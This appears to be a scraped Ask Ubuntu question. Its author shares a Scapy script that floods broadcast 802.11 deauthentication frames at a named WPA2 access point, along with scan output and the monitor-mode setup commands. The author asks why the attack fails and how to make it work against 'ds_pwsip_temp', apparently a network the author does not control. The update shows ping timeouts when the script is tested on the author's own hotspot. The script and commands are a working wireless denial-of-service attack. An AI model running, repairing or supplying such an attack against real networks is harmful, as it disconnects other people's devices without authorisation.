networking - Sending packets with Scapy - Ask Ubuntu
i want send deauthentication packets clients connected "ds_pwsip_temp". seems set correctly. when run script, packets being sent, connection on other laptop remains unaffected.
adrian@adrian-lenovo-z70-80:~$ iwlist wlp3s0 scan wlp3s0 scan completed : cell 01 - address: e4:f4:c6:f9:13:91 channel:112 frequency:5.56 ghz (channel 112) quality=70/70 signal level=-35 dbm encryption key:on essid:"ds_pwsip_temp" bit rates:6 mb/s; 9 mb/s; 12 mb/s; 18 mb/s; 24 mb/s 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8ec78570 extra: last beacon: 1060ms ago ie: unknown: 000d64735f70777369705f74656d70 ie: unknown: 01088c129824b048606c ie: unknown: 030170 ie: unknown: 073c504c202401142801142c01143001143401143801143c011440011464011b68011b6c011b70011b74011b78011b7c011b80011b84011b88011b8c011b ie: unknown: 200107 ie: ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers (1) : ccmp authentication suites (1) : psk ie: unknown: dd180050f2020101820003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e011bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e011bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c34700f0800000000000000000000000000000000000000 ie: unknown: 3d16700f0800000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000 cell 02 - address: e4:f4:c6:f9:13:80 channel:3 frequency:2.422 ghz (channel 3) quality=68/70 signal level=-42 dbm encryption key:on essid:"eduroam" bit rates:1 mb/s; 2 mb/s; 5.5 mb/s; 11 mb/s; 6 mb/s 9 mb/s; 12 mb/s; 18 mb/s bit rates:24 mb/s; 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8f071286 extra: last beacon: 3340ms ago ie: unknown: 0007656475726f616d ie: unknown: 010882848b960c121824 ie: unknown: 030103 ie: unknown: 0706504c20010d14 ie: ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers (1) : ccmp authentication suites (1) : 802.1x ie: unknown: 2a0100 ie: unknown: 32043048606c ie: unknown: dd180050f2020101840003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e111bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e111bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c3403080a00000000000000000000000000000000000000 ie: unknown: 3d1603080a00000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000 cell 03 - address: e4:f4:c6:f9:13:81 channel:3 frequency:2.422 ghz (channel 3) quality=66/70 signal level=-44 dbm encryption key:on essid:"ds_pwsip_temp" bit rates:1 mb/s; 2 mb/s; 5.5 mb/s; 11 mb/s; 6 mb/s 9 mb/s; 12 mb/s; 18 mb/s bit rates:24 mb/s; 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8f06d690 extra: last beacon: 3356ms ago ie: unknown: 000d64735f70777369705f74656d70 ie: unknown: 010882848b960c121824 ie: unknown: 030103 ie: unknown: 0706504c20010d14 ie: ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers (1) : ccmp authentication suites (1) : psk ie: unknown: 2a0100 ie: unknown: 32043048606c ie: unknown: dd180050f2020101840003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e111bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e111bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c3403080a00000000000000000000000000000000000000 ie: unknown: 3d1603080a00000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000 cell 04 - address: e4:f4:c6:f9:13:84 channel:3 frequency:2.422 ghz (channel 3) quality=65/70 signal level=-45 dbm encryption key:on essid:"ds-adm" bit rates:1 mb/s; 2 mb/s; 5.5 mb/s; 11 mb/s; 6 mb/s 9 mb/s; 12 mb/s; 18 mb/s bit rates:24 mb/s; 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8f06e1a8 extra: last beacon: 3352ms ago ie: unknown: 000644532d41444d ie: unknown: 010882848b960c121824 ie: unknown: 030103 ie: unknown: 0706504c20010d14 ie: ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers (1) : ccmp authentication suites (1) : psk ie: unknown: 2a0100 ie: unknown: 32043048606c ie: unknown: dd180050f2020101840003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e111bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e111bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c3403080a00000000000000000000000000000000000000 ie: unknown: 3d1603080a00000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000 cell 05 - address: e4:f4:c6:f9:13:85 channel:3 frequency:2.422 ghz (channel 3) quality=68/70 signal level=-42 dbm encryption key:off essid:"ds-hotspot" bit rates:1 mb/s; 2 mb/s; 5.5 mb/s; 11 mb/s; 6 mb/s 9 mb/s; 12 mb/s; 18 mb/s bit rates:24 mb/s; 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8f06ec80 extra: last beacon: 3336ms ago ie: unknown: 000a44532d486f7453706f74 ie: unknown: 010882848b960c121824 ie: unknown: 030103 ie: unknown: 0706504c20010d14 ie: unknown: 2a0100 ie: unknown: 32043048606c ie: unknown: dd180050f2020101840003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e111bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e111bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c3403080a00000000000000000000000000000000000000 ie: unknown: 3d1603080a00000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000 cell 06 - address: 00:0e:8e:43:a4:0f channel:5 frequency:2.432 ghz (channel 5) quality=36/70 signal level=-74 dbm encryption key:off essid:"hotspot_um" bit rates:1 mb/s; 2 mb/s; 5.5 mb/s; 11 mb/s; 6 mb/s 9 mb/s; 12 mb/s; 18 mb/s bit rates:24 mb/s; 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=000001dc1c435310 extra: last beacon: 3248ms ago ie: unknown: 000a484f5453504f545f554d ie: unknown: 010882848b960c121824 ie: unknown: 030105 ie: unknown: 2a0100 ie: unknown: 32043048606c ie: unknown: dd2a000c42000000011e0010000001661d060000303030453845343341343046000000000000000005028009 cell 07 - address: e4:f4:c6:f9:13:90 channel:112 frequency:5.56 ghz (channel 112) quality=70/70 signal level=-36 dbm encryption key:on essid:"eduroam" bit rates:6 mb/s; 9 mb/s; 12 mb/s; 18 mb/s; 24 mb/s 36 mb/s; 48 mb/s; 54 mb/s mode:master extra:tsf=0000001c8ec78340 extra: last beacon: 1060ms ago ie: unknown: 0007656475726f616d ie: unknown: 01088c129824b048606c ie: unknown: 030170 ie: unknown: 073c504c202401142801142c01143001143401143801143c011440011464011b68011b6c011b70011b74011b78011b7c011b80011b84011b88011b8c011b ie: unknown: 200107 ie: ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers (1) : ccmp authentication suites (1) : 802.1x ie: unknown: dd180050f2020101820003a4000027a4000042435e0062322f00 ie: unknown: dd1e00904c338e011bffff000000000000000000000000000000000000000000 ie: unknown: 2d1a8e011bffff000000000000000000000000000000000000000000 ie: unknown: dd1a00904c34700f0800000000000000000000000000000000000000 ie: unknown: 3d16700f0800000000000000000000000000000000000000 ie: unknown: 4a0e14000a002c01c800140005001900 ie: unknown: 7f0101 ie: unknown: dd0900037f01010000ff7f ie: unknown: dd0a00037f04010000004000
i don't know why there 2 access points called "ds_pwsip_temp" (please, explain).
address: e4:f4:c6:f9:13:91 channel:112
address: e4:f4:c6:f9:13:81 channel:3
i've used both addresses (each time changing channel in terminal).
this deauth script:
#! /usr/bin/env python scapy.all import * mac = "ff:ff:ff:ff:ff:ff" bssid = "e4:f4:c6:f9:13:91" pkt = radiotap() / dot11( addr1 = mac, addr2 = bssid, addr3 = bssid ) / dot11deauth() sendp( pkt, iface = "wlp3s0", count = 10000, inter = .2 )
this how conduct attack:
adrian@adrian-lenovo-z70-80:~$ sudo service network-manager stop [sudo] password adrian: adrian@adrian-lenovo-z70-80:~$ iwconfig wlp3s0 ieee 802.11abgn essid:off/any mode:managed access point: not-associated tx-power=20 dbm retry short limit:7 rts thr:off fragment thr:off power management:on enp2s0 no wireless extensions. lo no wireless extensions. adrian@adrian-lenovo-z70-80:~$ sudo ifconfig wlp3s0 down adrian@adrian-lenovo-z70-80:~$ sudo iwconfig wlp3s0 mode monitor adrian@adrian-lenovo-z70-80:~$ sudo ifconfig wlp3s0 adrian@adrian-lenovo-z70-80:~$ sudo iwconfig wlp3s0 channel 112 adrian@adrian-lenovo-z70-80:~$ iwconfig wlp3s0 ieee 802.11abgn mode:monitor frequency:5.56 ghz tx-power=20 dbm retry short limit:7 rts thr:off fragment thr:off power management:on enp2s0 no wireless extensions. lo no wireless extensions. adrian@adrian-lenovo-z70-80:~$ sudo ./deauth.py warning: no route found ipv6 destination :: (no default route?) ..........................................................................................................................................................................^c sent 170 packets. adrian@adrian-lenovo-z70-80:~$
why isn't working?
------------------------------ update: ------------------------------
another test, time on phone's wi-fi hotspot (wpa2 psk) 1 client (my other laptop).
microsoft windows [version 6.1.7601] copyright (c) 2009 microsoft corporation. rights reserved. c:\users\adrian>ping -t google.pl pinging google.pl [216.58.210.3] 32 bytes of data: reply 216.58.210.3: bytes=32 time=79ms ttl=49 reply 216.58.210.3: bytes=32 time=79ms ttl=49 reply 216.58.210.3: bytes=32 time=57ms ttl=49 reply 216.58.210.3: bytes=32 time=66ms ttl=49 reply 216.58.210.3: bytes=32 time=65ms ttl=49 reply 216.58.210.3: bytes=32 time=84ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=77ms ttl=49 reply 216.58.210.3: bytes=32 time=70ms ttl=49 reply 216.58.210.3: bytes=32 time=65ms ttl=49 reply 216.58.210.3: bytes=32 time=64ms ttl=49 reply 216.58.210.3: bytes=32 time=64ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=80ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=2826ms ttl=49 reply 216.58.210.3: bytes=32 time=78ms ttl=49 reply 216.58.210.3: bytes=32 time=67ms ttl=49 reply 216.58.210.3: bytes=32 time=65ms ttl=49 reply 216.58.210.3: bytes=32 time=64ms ttl=49 reply 216.58.210.3: bytes=32 time=62ms ttl=49 reply 216.58.210.3: bytes=32 time=60ms ttl=49 reply 216.58.210.3: bytes=32 time=68ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=93ms ttl=49 reply 216.58.210.3: bytes=32 time=75ms ttl=49 reply 216.58.210.3: bytes=32 time=102ms ttl=49 reply 216.58.210.3: bytes=32 time=72ms ttl=49 reply 216.58.210.3: bytes=32 time=80ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=65ms ttl=49 reply 216.58.210.3: bytes=32 time=63ms ttl=49 reply 216.58.210.3: bytes=32 time=61ms ttl=49 reply 216.58.210.3: bytes=32 time=72ms ttl=49 reply 216.58.210.3: bytes=32 time=67ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=87ms ttl=49 reply 216.58.210.3: bytes=32 time=64ms ttl=49 reply 216.58.210.3: bytes=32 time=72ms ttl=49 reply 216.58.210.3: bytes=32 time=111ms ttl=49 reply 216.58.210.3: bytes=32 time=80ms ttl=49 request timed out. reply 216.58.210.3: bytes=32 time=109ms ttl=49 reply 216.58.210.3: bytes=32 time=63ms ttl=49 reply 216.58.210.3: bytes=32 time=88ms ttl=49 reply 216.58.210.3: bytes=32 time=70ms ttl=49 reply 216.58.210.3: bytes=32 time=70ms ttl=49 reply 216.58.210.3: bytes=32 time=2018ms ttl=49 reply 216.58.210.3: bytes=32 time=87ms ttl=49 reply 216.58.210.3: bytes=32 time=64ms ttl=49 reply 216.58.210.3: bytes=32 time=63ms ttl=49 reply 216.58.210.3: bytes=32 time=70ms ttl=49 reply 216.58.210.3: bytes=32 time=59ms ttl=49 reply 216.58.210.3: bytes=32 time=67ms ttl=49 reply 216.58.210.3: bytes=32 time=75ms ttl=49 reply 216.58.210.3: bytes=32 time=83ms ttl=49 reply 216.58.210.3: bytes=32 time=751ms ttl=49 reply 216.58.210.3: bytes=32 time=62ms ttl=49 reply 216.58.210.3: bytes=32 time=69ms ttl=49 reply 216.58.210.3: bytes=32 time=66ms ttl=49 reply 216.58.210.3: bytes=32 time=86ms ttl=49 reply 216.58.210.3: bytes=32 time=83ms ttl=49 reply 216.58.210.3: bytes=32 time=61ms ttl=49 reply 216.58.210.3: bytes=32 time=61ms ttl=49 reply 216.58.210.3: bytes=32 time=58ms ttl=49 reply 216.58.210.3: bytes=32 time=66ms ttl=49 ping statistics 216.58.210.3: packets: sent = 66, received = 59, lost = 7 (10% loss), approximate round trip times in milli-seconds: minimum = 57ms, maximum = 2826ms, average = 163ms control-c ^c c:\users\adrian>
few "request timed out" before stopped script. how can make work "ds_pwsip_temp"?
Comments
Post a Comment